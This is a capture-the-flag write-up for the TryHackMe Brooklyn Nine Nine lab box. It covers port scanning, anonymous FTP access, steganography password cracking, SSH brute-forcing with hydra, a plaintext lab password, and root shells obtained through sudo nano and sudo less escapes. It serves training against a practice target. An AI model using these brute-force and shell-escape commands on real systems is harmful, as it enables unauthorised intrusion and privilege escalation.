mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-26 21:50:25 +00:00
163 lines
5.4 KiB
Markdown
163 lines
5.4 KiB
Markdown
|
# TryHackMe-BrooklynCTF
|
||
|
Abdullah Rizwan, 25 August , 09:15 PM
|
||
|
|
||
|
BrooklynCTF is a beginner level anyone can try to hack this box. There are two main intended ways to root the box.
|
||
|
|
||
|
## NMAP
|
||
|
```
|
||
|
nmap -sC -sV 10.10.182.198
|
||
|
```
|
||
|
|
||
|
```
|
||
|
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 21:16 EDT
|
||
|
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
|
||
|
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:16 (0:00:00 remaining)
|
||
|
Nmap scan report for 10.10.182.198
|
||
|
Host is up (0.16s latency).
|
||
|
Not shown: 997 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
21/tcp open ftp vsftpd 3.0.3
|
||
|
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||
|
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
|
||
|
| ftp-syst:
|
||
|
| STAT:
|
||
|
| FTP server status:
|
||
|
| Connected to ::ffff:10.8.94.60
|
||
|
| Logged in as ftp
|
||
|
| TYPE: ASCII
|
||
|
| No session bandwidth limit
|
||
|
| Session timeout in seconds is 300
|
||
|
| Control connection is plain text
|
||
|
| Data connections will be plain text
|
||
|
| At session startup, client count was 3
|
||
|
| vsFTPd 3.0.3 - secure, fast, stable
|
||
|
|_End of status
|
||
|
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|
||
|
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|
||
|
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
||
|
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||
|
|_http-title: Site doesn't have a title (text/html).
|
||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
|
||
|
|
||
|
```
|
||
|
There are 3 ports open on this box.Lets first visit the webpage.
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
<a href="https://imgur.com/gXJz19O"><img src="https://i.imgur.com/gXJz19O.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
<a href="https://imgur.com/HmjZ1iK"><img src="https://i.imgur.com/HmjZ1iK.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
When we look at the source of this page it says something about steganography so that image has something hidden with it.
|
||
|
|
||
|
## PORT 21
|
||
|
|
||
|
<a href="https://imgur.com/sNTPWsN"><img src="https://i.imgur.com/sNTPWsN.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
Since ftp is open we can connect to using the username "anonymous" with no password to be provided and we can download a file named "note_to_jake".
|
||
|
|
||
|
<a href="https://imgur.com/wwNH0TH"><img src="https://i.imgur.com/wwNH0TH.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
So we know that there is a user named "jake".
|
||
|
|
||
|
## Steganography
|
||
|
|
||
|
We saw a hidden message towards steganography so now lets try to extract data from image.
|
||
|
|
||
|
<a href="https://imgur.com/qspdhaP"><img src="https://i.imgur.com/qspdhaP.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
If we try to extract data from image it's going to ask for a password so we have to crack it using "stegcracker" which can be installed from here
|
||
|
https://github.com/Paradoxis/StegCracker.
|
||
|
|
||
|
<a href="https://imgur.com/ShNAWPL"><img src="https://i.imgur.com/ShNAWPL.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
<a href="https://imgur.com/ShNAWPL"><img src="https://i.imgur.com/ShNAWPL.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
## PORT 22
|
||
|
|
||
|
As we have found that there are two users "jake" and "holt" in order to find out jake's password we can bruteforce ssh using hydra
|
||
|
|
||
|
```
|
||
|
hydra -l jake -P /usr/share/wordlists/rockyou.txt -t 16 10.10.182.198 ssh
|
||
|
|
||
|
```
|
||
|
|
||
|
<a href="https://imgur.com/p3YTZ48"><img src="https://i.imgur.com/p3YTZ48.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
For simplicity lets make a variable for the box's IP
|
||
|
|
||
|
```
|
||
|
export IP=10.10.182.198
|
||
|
```
|
||
|
<a href="https://imgur.com/NNPCW29"><img src="https://i.imgur.com/NNPCW29.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
<a href="https://imgur.com/OSQMIBE"><img src="https://i.imgur.com/OSQMIBE.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
We can now use "less" command in order to view files.
|
||
|
|
||
|
|
||
|
## Privilege Escalation (Holt)
|
||
|
|
||
|
In order to completely own the box through Holt we have sudo rights for "nano".
|
||
|
|
||
|
The password that we got from extracting information from the image can be utilized here
|
||
|
|
||
|
|
||
|
Login as "holt" from ssh using password "fluffydog12@ninenine".
|
||
|
|
||
|
<a href="https://imgur.com/NNPCW29"><img src="https://i.imgur.com/NNPCW29.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
```
|
||
|
holt@brookly_nine_nine:~$ sudo -l
|
||
|
Matching Defaults entries for holt on brookly_nine_nine:
|
||
|
env_reset, mail_badpass,
|
||
|
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
|
||
|
|
||
|
User holt may run the following commands on brookly_nine_nine:
|
||
|
(ALL) NOPASSWD: /bin/nano
|
||
|
holt@brookly_nine_nine:~$
|
||
|
|
||
|
```
|
||
|
Visit GTFOBIN for escalating privileges
|
||
|
|
||
|
```
|
||
|
sudo nano
|
||
|
```
|
||
|
```
|
||
|
^R^X
|
||
|
```
|
||
|
```
|
||
|
reset; sh 1>&0 2>&0
|
||
|
```
|
||
|
<a href="https://imgur.com/tHylRoZ"><img src="https://i.imgur.com/tHylRoZ.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
As soon as you'll hit enter you will be "root".
|
||
|
|
||
|
<a href="https://imgur.com/0K4C4zl"><img src="https://i.imgur.com/0K4C4zl.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
|
||
|
## Privilege Escalation (Jake)
|
||
|
|
||
|
Login as jake through ssh after you got his credentials through bruteforce or you can switch between usesr.
|
||
|
|
||
|
```
|
||
|
su - jake
|
||
|
password:
|
||
|
```
|
||
|
|
||
|
<a href="https://imgur.com/OSQMIBE"><img src="https://i.imgur.com/OSQMIBE.png" title="source: imgur.com" /></a>
|
||
|
|
||
|
```
|
||
|
sudo less /etc/profile
|
||
|
```
|
||
|
```
|
||
|
!/bin/sh
|
||
|
```
|
||
|
<a href="https://imgur.com/1Fkjhyn"><img src="https://i.imgur.com/1Fkjhyn.png" title="source: imgur.com" /></a>
|